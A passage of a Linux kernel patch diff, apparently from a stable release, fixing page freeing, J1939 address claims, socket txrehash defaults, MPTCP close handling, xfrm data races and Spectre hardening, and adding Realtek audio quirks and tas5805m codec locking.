+index 6e60657875d32..b2877a84ed19c 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -5640,9 +5640,12 @@ EXPORT_SYMBOL(get_zeroed_page);
+  */
+ void __free_pages(struct page *page, unsigned int order)
+ {
++	/* get PageHead before we drop reference */
++	int head = PageHead(page);
++
+ 	if (put_page_testzero(page))
+ 		free_the_page(page, order);
+-	else if (!PageHead(page))
++	else if (!head)
+ 		while (order-- > 0)
+ 			free_the_page(page + (1 << order), order);
+ }
+diff --git a/net/can/j1939/address-claim.c b/net/can/j1939/address-claim.c
+index f33c473279278..ca4ad6cdd5cbf 100644
+--- a/net/can/j1939/address-claim.c
++++ b/net/can/j1939/address-claim.c
+@@ -165,6 +165,46 @@ static void j1939_ac_process(struct j1939_priv *priv, struct sk_buff *skb)
+ 	 * leaving this function.
+ 	 */
+ 	ecu = j1939_ecu_get_by_name_locked(priv, name);
++
++	if (ecu && ecu->addr == skcb->addr.sa) {
++		/* The ISO 11783-5 standard, in "4.5.2 - Address claim
++		 * requirements", states:
++		 *   d) No CF shall begin, or resume, transmission on the
++		 *      network until 250 ms after it has successfully claimed
++		 *      an address except when responding to a request for
++		 *      address-claimed.
++		 *
++		 * But "Figure 6" and "Figure 7" in "4.5.4.2 - Address-claim
++		 * prioritization" show that the CF begins the transmission
++		 * after 250 ms from the first AC (address-claimed) message
++		 * even if it sends another AC message during that time window
++		 * to resolve the address contention with another CF.
++		 *
++		 * As stated in "4.4.2.3 - Address-claimed message":
++		 *   In order to successfully claim an address, the CF sending
++		 *   an address claimed message shall not receive a contending
++		 *   claim from another CF for at least 250 ms.
++		 *
++		 * As stated in "4.4.3.2 - NAME management (NM) message":
++		 *   1) A commanding CF can
++		 *      d) request that a CF with a specified NAME transmit
++		 *         the address-claimed message with its current NAME.
++		 *   2) A target CF shall
++		 *      d) send an address-claimed message in response to a
++		 *         request for a matching NAME
++		 *
++		 * Taking the above arguments into account, the 250 ms wait is
++		 * requested only during network initialization.
++		 *
++		 * Do not restart the timer on AC message if both the NAME and
++		 * the address match and so if the address has already been
++		 * claimed (timer has expired) or the AC message has been sent
++		 * to resolve the contention with another CF (timer is still
++		 * running).
++		 */
++		goto out_ecu_put;
++	}
++
+ 	if (!ecu && j1939_address_is_unicast(skcb->addr.sa))
+ 		ecu = j1939_ecu_create_locked(priv, name);
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 30407b2dd2ac4..ba6ea61b3458b 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1524,6 +1524,8 @@ set_sndbuf:
+ 			ret = -EINVAL;
+ 			break;
+ 		}
++		if ((u8)val == SOCK_TXREHASH_DEFAULT)
++			val = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+ 		/* Paired with READ_ONCE() in tcp_rtx_synack() */
+ 		WRITE_ONCE(sk->sk_txrehash, (u8)val);
+ 		break;
+@@ -3428,7 +3430,6 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	sk->sk_pacing_rate = ~0UL;
+ 	WRITE_ONCE(sk->sk_pacing_shift, 10);
+ 	sk->sk_incoming_cpu = -1;
+-	sk->sk_txrehash = SOCK_TXREHASH_DEFAULT;
+ 
+ 	sk_rx_queue_clear(sk);
+ 	/*
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 92d4237862518..5b19b77d5d759 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -347,6 +347,7 @@ lookup_protocol:
+ 	sk->sk_destruct	   = inet_sock_destruct;
+ 	sk->sk_protocol	   = protocol;
+ 	sk->sk_backlog_rcv = sk->sk_prot->backlog_rcv;
++	sk->sk_txrehash = READ_ONCE(net->core.sysctl_txrehash);
+ 
+ 	inet->uc_ttl	= -1;
+ 	inet->mc_loop	= 1;
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 647b3c6b575ef..7152ede18f115 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -1225,9 +1225,6 @@ int inet_csk_listen_start(struct sock *sk)
+ 	sk->sk_ack_backlog = 0;
+ 	inet_csk_delack_init(sk);
+ 
+-	if (sk->sk_txrehash == SOCK_TXREHASH_DEFAULT)
+-		sk->sk_txrehash = READ_ONCE(sock_net(sk)->core.sysctl_txrehash);
+-
+ 	/* There is race window here: we announce ourselves listening,
+ 	 * but this transition is still not validated by get_port().
+ 	 * It is OK, because this socket enters to hash table only
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index 7b0cd54da452b..fb1bf6eb0ff8e 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -221,6 +221,7 @@ lookup_protocol:
+ 	np->pmtudisc	= IPV6_PMTUDISC_WANT;
+ 	np->repflow	= net->ipv6.sysctl.flowlabel_reflect & FLOWLABEL_REFLECT_ESTABLISHED;
+ 	sk->sk_ipv6only	= net->ipv6.sysctl.bindv6only;
++	sk->sk_txrehash = READ_ONCE(net->core.sysctl_txrehash);
+ 
+ 	/* Init the ipv4 part of the socket since we can have sockets
+ 	 * using v6 API for ipv4.
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 29849d77e4bf8..938cccab331dd 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2908,6 +2908,7 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	bool do_cancel_work = false;
++	int subflows_alive = 0;
+ 
+ 	sk->sk_shutdown = SHUTDOWN_MASK;
+ 
+@@ -2933,6 +2934,8 @@ cleanup:
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast_nested(ssk);
+ 
++		subflows_alive += ssk->sk_state != TCP_CLOSE;
++
+ 		/* since the close timeout takes precedence on the fail one,
+ 		 * cancel the latter
+ 		 */
+@@ -2948,6 +2951,12 @@ cleanup:
+ 	}
+ 	sock_orphan(sk);
+ 
++	/* all the subflows are closed, only timeout can change the msk
++	 * state, let's not keep resources busy for no reasons
++	 */
++	if (subflows_alive == 0)
++		inet_sk_state_store(sk, TCP_CLOSE);
++
+ 	sock_hold(sk);
+ 	pr_debug("msk=%p state=%d", sk, sk->sk_state);
+ 	if (mptcp_sk(sk)->token)
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 5220435d8e34d..929b0ee8b3d5f 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1344,6 +1344,7 @@ void __mptcp_error_report(struct sock *sk)
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		int err = sock_error(ssk);
++		int ssk_state;
+ 
+ 		if (!err)
+ 			continue;
+@@ -1354,7 +1355,14 @@ void __mptcp_error_report(struct sock *sk)
+ 		if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(msk))
+ 			continue;
+ 
+-		inet_sk_state_store(sk, inet_sk_state_load(ssk));
++		/* We need to propagate only transition to CLOSE state.
++		 * Orphaned socket will see such state change via
++		 * subflow_sched_work_if_closed() and that path will properly
++		 * destroy the msk as needed.
++		 */
++		ssk_state = inet_sk_state_load(ssk);
++		if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
++			inet_sk_state_store(sk, ssk_state);
+ 		sk->sk_err = -err;
+ 
+ 		/* This barrier is coupled with smp_rmb() in mptcp_poll() */
+diff --git a/net/rds/message.c b/net/rds/message.c
+index 44dbc612ef549..9402bc941823f 100644
+--- a/net/rds/message.c
++++ b/net/rds/message.c
+@@ -104,9 +104,9 @@ static void rds_rm_zerocopy_callback(struct rds_sock *rs,
+ 	spin_lock_irqsave(&q->lock, flags);
+ 	head = &q->zcookie_head;
+ 	if (!list_empty(head)) {
+-		info = list_entry(head, struct rds_msg_zcopy_info,
+-				  rs_zcookie_next);
+-		if (info && rds_zcookie_add(info, cookie)) {
++		info = list_first_entry(head, struct rds_msg_zcopy_info,
++					rs_zcookie_next);
++		if (rds_zcookie_add(info, cookie)) {
+ 			spin_unlock_irqrestore(&q->lock, flags);
+ 			kfree(rds_info_from_znotifier(znotif));
+ 			/* caller invokes rds_wake_sk_sleep() */
+diff --git a/net/xfrm/xfrm_compat.c b/net/xfrm/xfrm_compat.c
+index a0f62fa02e06e..8cbf45a8bcdc2 100644
+--- a/net/xfrm/xfrm_compat.c
++++ b/net/xfrm/xfrm_compat.c
+@@ -5,6 +5,7 @@
+  * Based on code and translator idea by: Florian Westphal <fw@strlen.de>
+  */
+ #include <linux/compat.h>
++#include <linux/nospec.h>
+ #include <linux/xfrm.h>
+ #include <net/xfrm.h>
+ 
+@@ -302,7 +303,7 @@ static int xfrm_xlate64(struct sk_buff *dst, const struct nlmsghdr *nlh_src)
+ 	nla_for_each_attr(nla, attrs, len, remaining) {
+ 		int err;
+ 
+-		switch (type) {
++		switch (nlh_src->nlmsg_type) {
+ 		case XFRM_MSG_NEWSPDINFO:
+ 			err = xfrm_nla_cpy(dst, nla, nla_len(nla));
+ 			break;
+@@ -437,6 +438,7 @@ static int xfrm_xlate32_attr(void *dst, const struct nlattr *nla,
+ 		NL_SET_ERR_MSG(extack, "Bad attribute");
+ 		return -EOPNOTSUPP;
+ 	}
++	type = array_index_nospec(type, XFRMA_MAX + 1);
+ 	if (nla_len(nla) < compat_policy[type].len) {
+ 		NL_SET_ERR_MSG(extack, "Attribute bad length");
+ 		return -EOPNOTSUPP;
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index 97074f6f2bdee..2defd89da700d 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -279,8 +279,7 @@ static int xfrm6_remove_tunnel_encap(struct xfrm_state *x, struct sk_buff *skb)
+ 		goto out;
+ 
+ 	if (x->props.flags & XFRM_STATE_DECAP_DSCP)
+-		ipv6_copy_dscp(ipv6_get_dsfield(ipv6_hdr(skb)),
+-			       ipipv6_hdr(skb));
++		ipv6_copy_dscp(XFRM_MODE_SKB_CB(skb)->tos, ipipv6_hdr(skb));
+ 	if (!(x->props.flags & XFRM_STATE_NOECN))
+ 		ipip6_ecn_decapsulate(skb);
+ 
+diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c
+index e392d8d05e0ca..52538d5360673 100644
+--- a/net/xfrm/xfrm_policy.c
++++ b/net/xfrm/xfrm_policy.c
+@@ -336,7 +336,7 @@ static void xfrm_policy_timer(struct timer_list *t)
+ 	}
+ 	if (xp->lft.hard_use_expires_seconds) {
+ 		time64_t tmo = xp->lft.hard_use_expires_seconds +
+-			(xp->curlft.use_time ? : xp->curlft.add_time) - now;
++			(READ_ONCE(xp->curlft.use_time) ? : xp->curlft.add_time) - now;
+ 		if (tmo <= 0)
+ 			goto expired;
+ 		if (tmo < next)
+@@ -354,7 +354,7 @@ static void xfrm_policy_timer(struct timer_list *t)
+ 	}
+ 	if (xp->lft.soft_use_expires_seconds) {
+ 		time64_t tmo = xp->lft.soft_use_expires_seconds +
+-			(xp->curlft.use_time ? : xp->curlft.add_time) - now;
++			(READ_ONCE(xp->curlft.use_time) ? : xp->curlft.add_time) - now;
+ 		if (tmo <= 0) {
+ 			warn = 1;
+ 			tmo = XFRM_KM_TIMEOUT;
+@@ -3586,7 +3586,8 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 		return 1;
+ 	}
+ 
+-	pol->curlft.use_time = ktime_get_real_seconds();
++	/* This lockless write can happen from different cpus. */
++	WRITE_ONCE(pol->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	pols[0] = pol;
+ 	npols++;
+@@ -3601,7 +3602,9 @@ int __xfrm_policy_check(struct sock *sk, int dir, struct sk_buff *skb,
+ 				xfrm_pol_put(pols[0]);
+ 				return 0;
+ 			}
+-			pols[1]->curlft.use_time = ktime_get_real_seconds();
++			/* This write can happen from different cpus. */
++			WRITE_ONCE(pols[1]->curlft.use_time,
++				   ktime_get_real_seconds());
+ 			npols++;
+ 		}
+ 	}
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 3d2fe7712ac5b..0f88cb6fc3c22 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -572,7 +572,7 @@ static enum hrtimer_restart xfrm_timer_handler(struct hrtimer *me)
+ 	}
+ 	if (x->lft.hard_use_expires_seconds) {
+ 		long tmo = x->lft.hard_use_expires_seconds +
+-			(x->curlft.use_time ? : now) - now;
++			(READ_ONCE(x->curlft.use_time) ? : now) - now;
+ 		if (tmo <= 0)
+ 			goto expired;
+ 		if (tmo < next)
+@@ -594,7 +594,7 @@ static enum hrtimer_restart xfrm_timer_handler(struct hrtimer *me)
+ 	}
+ 	if (x->lft.soft_use_expires_seconds) {
+ 		long tmo = x->lft.soft_use_expires_seconds +
+-			(x->curlft.use_time ? : now) - now;
++			(READ_ONCE(x->curlft.use_time) ? : now) - now;
+ 		if (tmo <= 0)
+ 			warn = 1;
+ 		else if (tmo < next)
+@@ -1754,7 +1754,7 @@ out:
+ 
+ 		hrtimer_start(&x1->mtimer, ktime_set(1, 0),
+ 			      HRTIMER_MODE_REL_SOFT);
+-		if (x1->curlft.use_time)
++		if (READ_ONCE(x1->curlft.use_time))
+ 			xfrm_state_check_expire(x1);
+ 
+ 		if (x->props.smark.m || x->props.smark.v || x->if_id) {
+@@ -1786,8 +1786,8 @@ EXPORT_SYMBOL(xfrm_state_update);
+ 
+ int xfrm_state_check_expire(struct xfrm_state *x)
+ {
+-	if (!x->curlft.use_time)
+-		x->curlft.use_time = ktime_get_real_seconds();
++	if (!READ_ONCE(x->curlft.use_time))
++		WRITE_ONCE(x->curlft.use_time, ktime_get_real_seconds());
+ 
+ 	if (x->curlft.bytes >= x->lft.hard_byte_limit ||
+ 	    x->curlft.packets >= x->lft.hard_packet_limit) {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index db9518de9343c..1134a493d225a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9423,6 +9423,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x89c3, "Zbook Studio G9", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89c6, "Zbook Fury 17 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x89ca, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x89d3, "HP EliteBook 645 G9 (MB 89D2)", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8a78, "HP Dev One", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa0, "HP ProBook 440 G9 (MB 8A9E)", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8aa3, "HP ProBook 450 G9 (MB 8AA1)", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9433,6 +9434,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9480,6 +9486,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
++	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e5e, "ASUS ROG Strix G513", ALC294_FIXUP_ASUS_G513_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e8e, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA401),
+@@ -9523,6 +9530,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc812, "Samsung Notebook Pen S (NT950SBE-X58)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
++	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+@@ -9701,6 +9709,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b7d, 0xa831, "Ordissimo EVE2 ", ALC269VB_FIXUP_ORDISSIMO_EVE2), /* Also known as Malata PC-B1303 */
+ 	SND_PCI_QUIRK(0x1c06, 0x2013, "Lemote A1802", ALC269_FIXUP_LEMOTE_A1802),
+ 	SND_PCI_QUIRK(0x1c06, 0x2015, "Lemote A190X", ALC269_FIXUP_LEMOTE_A190X),
++	SND_PCI_QUIRK(0x1c6c, 0x1251, "Positivo N14KP6-TG", ALC288_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d05, 0x1132, "TongFang PHxTxX1", ALC256_FIXUP_SET_COEF_DEFAULTS),
+ 	SND_PCI_QUIRK(0x1d05, 0x1096, "TongFang GMxMRxx", ALC269_FIXUP_NO_SHUTUP),
+ 	SND_PCI_QUIRK(0x1d05, 0x1100, "TongFang GKxNRxx", ALC269_FIXUP_NO_SHUTUP),
+diff --git a/sound/pci/lx6464es/lx_core.c b/sound/pci/lx6464es/lx_core.c
+index d3f58a3d17fbc..b5b0d43bb8dcd 100644
+--- a/sound/pci/lx6464es/lx_core.c
++++ b/sound/pci/lx6464es/lx_core.c
+@@ -493,12 +493,11 @@ int lx_buffer_ask(struct lx6464es *chip, u32 pipe, int is_capture,
+ 		dev_dbg(chip->card->dev,
+ 			"CMD_08_ASK_BUFFERS: needed %d, freed %d\n",
+ 			    *r_needed, *r_freed);
+-		for (i = 0; i < MAX_STREAM_BUFFER; ++i) {
+-			for (i = 0; i != chip->rmh.stat_len; ++i)
+-				dev_dbg(chip->card->dev,
+-					"  stat[%d]: %x, %x\n", i,
+-					    chip->rmh.stat[i],
+-					    chip->rmh.stat[i] & MASK_DATA_SIZE);
++		for (i = 0; i < MAX_STREAM_BUFFER && i < chip->rmh.stat_len;
++		     ++i) {
++			dev_dbg(chip->card->dev, "  stat[%d]: %x, %x\n", i,
++				chip->rmh.stat[i],
++				chip->rmh.stat[i] & MASK_DATA_SIZE);
+ 		}
+ 	}
+ 
+diff --git a/sound/soc/codecs/tas5805m.c b/sound/soc/codecs/tas5805m.c
+index beb4ec629a03c..4e38eb7acea1b 100644
+--- a/sound/soc/codecs/tas5805m.c
++++ b/sound/soc/codecs/tas5805m.c
+@@ -154,6 +154,7 @@ static const uint32_t tas5805m_volume[] = {
+ #define TAS5805M_VOLUME_MIN	0
+ 
+ struct tas5805m_priv {
++	struct i2c_client		*i2c;
+ 	struct regulator		*pvdd;
+ 	struct gpio_desc		*gpio_pdn_n;
+ 
+@@ -165,6 +166,9 @@ struct tas5805m_priv {
+ 	int				vol[2];
+ 	bool				is_powered;
+ 	bool				is_muted;
++
++	struct work_struct		work;
++	struct mutex			lock;
+ };
+ 
+ static void set_dsp_scale(struct regmap *rm, int offset, int vol)
+@@ -181,13 +185,11 @@ static void set_dsp_scale(struct regmap *rm, int offset, int vol)
+ 	regmap_bulk_write(rm, offset, v, ARRAY_SIZE(v));
+ }
+ 
+-static void tas5805m_refresh(struct snd_soc_component *component)
++static void tas5805m_refresh(struct tas5805m_priv *tas5805m)
+ {
+-	struct tas5805m_priv *tas5805m =
+-		snd_soc_component_get_drvdata(component);
+ 	struct regmap *rm = tas5805m->regmap;
+ 
+-	dev_dbg(component->dev, "refresh: is_muted=%d, vol=%d/%d\n",
++	dev_dbg(&tas5805m->i2c->dev, "refresh: is_muted=%d, vol=%d/%d\n",
+ 		tas5805m->is_muted, tas5805m->vol[0], tas5805m->vol[1]);
+ 
+ 	regmap_write(rm, REG_PAGE, 0x00);
+@@ -201,6 +203,9 @@ static void tas5805m_refresh(struct snd_soc_component *component)
+ 	set_dsp_scale(rm, 0x24, tas5805m->vol[0]);
+ 	set_dsp_scale(rm, 0x28, tas5805m->vol[1]);
+ 
++	regmap_write(rm, REG_PAGE, 0x00);
++	regmap_write(rm, REG_BOOK, 0x00);
++
+ 	/* Set/clear digital soft-mute */
+ 	regmap_write(rm, REG_DEVICE_CTRL_2,
+ 		(tas5805m->is_muted ? DCTRL2_MUTE : 0) |
+@@ -226,8 +231,11 @@ static int tas5805m_vol_get(struct snd_kcontrol *kcontrol,
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+ 
++	mutex_lock(&tas5805m->lock);
+ 	ucontrol->value.integer.value[0] = tas5805m->vol[0];
+ 	ucontrol->value.integer.value[1] = tas5805m->vol[1];
++	mutex_unlock(&tas5805m->lock);
++
+ 	return 0;
+ }
+ 
+@@ -243,11 +251,13 @@ static int tas5805m_vol_put(struct snd_kcontrol *kcontrol,
+ 		snd_soc_kcontrol_component(kcontrol);
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
++	int ret = 0;
+ 
+ 	if (!(volume_is_valid(ucontrol->value.integer.value[0]) &&
+ 	      volume_is_valid(ucontrol->value.integer.value[1])))
+ 		return -EINVAL;
+ 
++	mutex_lock(&tas5805m->lock);
+ 	if (tas5805m->vol[0] != ucontrol->value.integer.value[0] ||
+ 	    tas5805m->vol[1] != ucontrol->value.integer.value[1]) {
+ 		tas5805m->vol[0] = ucontrol->value.integer.value[0];
+@@ -256,11 +266,12 @@ static int tas5805m_vol_put(struct snd_kcontrol *kcontrol,
+ 			tas5805m->vol[0], tas5805m->vol[1],
+ 			tas5805m->is_powered);
+ 		if (tas5805m->is_powered)
+-			tas5805m_refresh(component);
+-		return 1;
++			tas5805m_refresh(tas5805m);
++		ret = 1;
+ 	}
++	mutex_unlock(&tas5805m->lock);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new tas5805m_snd_controls[] = {
+@@ -294,54 +305,83 @@ static int tas5805m_trigger(struct snd_pcm_substream *substream, int cmd,
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tas5805m_priv *tas5805m =
+ 		snd_soc_component_get_drvdata(component);
+-	struct regmap *rm = tas5805m->regmap;
+-	unsigned int chan, global1, global2;
+ 
+ 	switch (cmd) {
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		dev_dbg(component->dev, "DSP startup\n");
+-
+-		/* We mustn't issue any I2C transactions until the I2S
+-		 * clock is stable. Furthermore, we must allow a 5ms
+-		 * delay after the first set of register writes to
+-		 * allow the DSP to boot before configuring it.
+-		 */
+-		usleep_range(5000, 10000);
+-		send_cfg(rm, dsp_cfg_preboot,
+-			ARRAY_SIZE(dsp_cfg_preboot));
+-		usleep_range(5000, 15000);
+-		send_cfg(rm, tas5805m->dsp_cfg_data,
+-			tas5805m->dsp_cfg_len);
+-
+-		tas5805m->is_powered = true;
+-		tas5805m_refresh(component);
++		dev_dbg(component->dev, "clock start\n");
++		schedule_work(&tas5805m->work);
+ 		break;
+ 
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		dev_dbg(component->dev, "DSP shutdown\n");
++		break;
+ 
+-		tas5805m->is_powered = false;
++	default:
++		return -EINVAL;
++	}
+ 
+-		regmap_write(rm, REG_PAGE, 0x00);
+-		regmap_write(rm, REG_BOOK, 0x00);
++	return 0;
++}
+ 
+-		regmap_read(rm, REG_CHAN_FAULT, &chan);
+-		regmap_read(rm, REG_GLOBAL_FAULT1, &global1);
+-		regmap_read(rm, REG_GLOBAL_FAULT2, &global2);
++static void do_work(struct work_struct *work)
++{
++	struct tas5805m_priv *tas5805m =
++	       container_of(work, struct tas5805m_priv, work);
++	struct regmap *rm = tas5805m->regmap;
+ 
+-		dev_dbg(component->dev,
+-			"fault regs: CHAN=%02x, GLOBAL1=%02x, GLOBAL2=%02x\n",
+-			chan, global1, global2);
++	dev_dbg(&tas5805m->i2c->dev, "DSP startup\n");
+ 
+-		regmap_write(rm, REG_DEVICE_CTRL_2, DCTRL2_MODE_HIZ);
+-		break;
++	mutex_lock(&tas5805m->lock);
++	/* We mustn't issue any I2C transactions until the I2S
++	 * clock is stable. Furthermore, we must allow a 5ms
++	 * delay after the first set of register writes to
++	 * allow the DSP to boot before configuring it.
++	 */
++	usleep_range(5000, 10000);
++	send_cfg(rm, dsp_cfg_preboot, ARRAY_SIZE(dsp_cfg_preboot));
++	usleep_range(5000, 15000);
++	send_cfg(rm, tas5805m->dsp_cfg_data, tas5805m->dsp_cfg_len);
++
++	tas5805m->is_powered = true;
++	tas5805m_refresh(tas5805m);
++	mutex_unlock(&tas5805m->lock);
++}
+ 
+-	default:
+-		return -EINVAL;
++static int tas5805m_dac_event(struct snd_soc_dapm_widget *w,
++			      struct snd_kcontrol *kcontrol, int event)
++{
++	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
++	struct tas5805m_priv *tas5805m =
++		snd_soc_component_get_drvdata(component);
++	struct regmap *rm = tas5805m->regmap;
++
++	if (event & SND_SOC_DAPM_PRE_PMD) {
++		unsigned int chan, global1, global2;
++
++		dev_dbg(component->dev, "DSP shutdown\n");
++		cancel_work_sync(&tas5805m->work);
++
++		mutex_lock(&tas5805m->lock);
++		if (tas5805m->is_powered) {
++			tas5805m->is_powered = false;
++
++			regmap_write(rm, REG_PAGE, 0x00);
++			regmap_write(rm, REG_BOOK, 0x00);
++
++			regmap_read(rm, REG_CHAN_FAULT, &chan);
++			regmap_read(rm, REG_GLOBAL_FAULT1, &global1);
++			regmap_read(rm, REG_GLOBAL_FAULT2, &global2);
++
++			dev_dbg(component->dev, "fault regs: CHAN=%02x, "
++				"GLOBAL1=%02x, GLOBAL2=%02x\n",
++				chan, global1, global2);
++
++			regmap_write(rm, REG_DEVICE_CTRL_2, DCTRL2_MODE_HIZ);
++		}
++		mutex_unlock(&tas5805m->lock);
+ 	}
+ 
+ 	return 0;
+@@ -354,7 +394,8 @@ static const struct snd_soc_dapm_route tas5805m_audio_map[] = {
+ 
+ static const struct snd_soc_dapm_widget tas5805m_dapm_widgets[] = {
+ 	SND_SOC_DAPM_AIF_IN("DAC IN", "Playback", 0, SND_SOC_NOPM, 0, 0),
+-	SND_SOC_DAPM_DAC("DAC", NULL, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_DAC_E("DAC", NULL, SND_SOC_NOPM, 0, 0,
++		tas5805m_dac_event, SND_SOC_DAPM_PRE_PMD),
+ 	SND_SOC_DAPM_OUTPUT("OUT")
+ };
+ 
